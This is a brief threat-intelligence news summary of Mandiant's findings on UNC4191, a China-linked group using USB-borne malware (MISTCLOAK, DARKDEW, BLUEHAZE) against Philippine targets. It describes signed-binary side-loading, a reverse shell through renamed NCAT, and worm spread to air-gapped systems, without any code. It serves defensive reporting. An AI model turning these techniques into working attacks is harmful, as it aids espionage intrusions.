"China-Linked UNC4191 APT Relies on USB Devices in Attacks Against Entities in the Philippines"
Researchers at Mandiant discovered an alleged China-linked cyberespionage group, UNC4191, using Universal Serial Bus (USB) devices as attack vectors in campaigns targeting entities in the Philippines. This campaign has been active since September 2021 and has targeted public and private sector entities primarily in Southeast Asia, as well as organizations in the US, Europe, and APJ. Even when the targeted organizations were based elsewhere, the specific systems targeted by UNC4191 were discovered to be physically located in the Philippines. In order to side-load malware, the attackers used legitimately signed binaries. Mandiant has been tracking the use of three new families, MISTCLOAK, DARKDEW, and BLUEHAZE. The infection chain starts when a user plugs in a compromised removable device and manually executes a renamed signed binary from the storage volume's root directory. The initial binaries are versions of USB Network Gate, a legitimately signed application developed by the company Electronic Team. These are used to deliver the MISTCLOAK malware, which masquerades as a legitimate Dynamic Link Library (DLL). When the target system is infected, UNC4191 launches a renamed NCAT binary and executes a reverse shell to keep a foothold. The malicious code is wormable and replicates itself by infecting new removable drives plugged into a compromised system, meaning the payloads spread to other systems and may compromise air-gapped systems. The threat actors have been observed enumerating domain trusts and querying domain and local group permissions within minutes. This article continues to discuss the UNC4191 Advanced Persistent Threat (APT) group using USB devices in attacks against entities in the Philippines.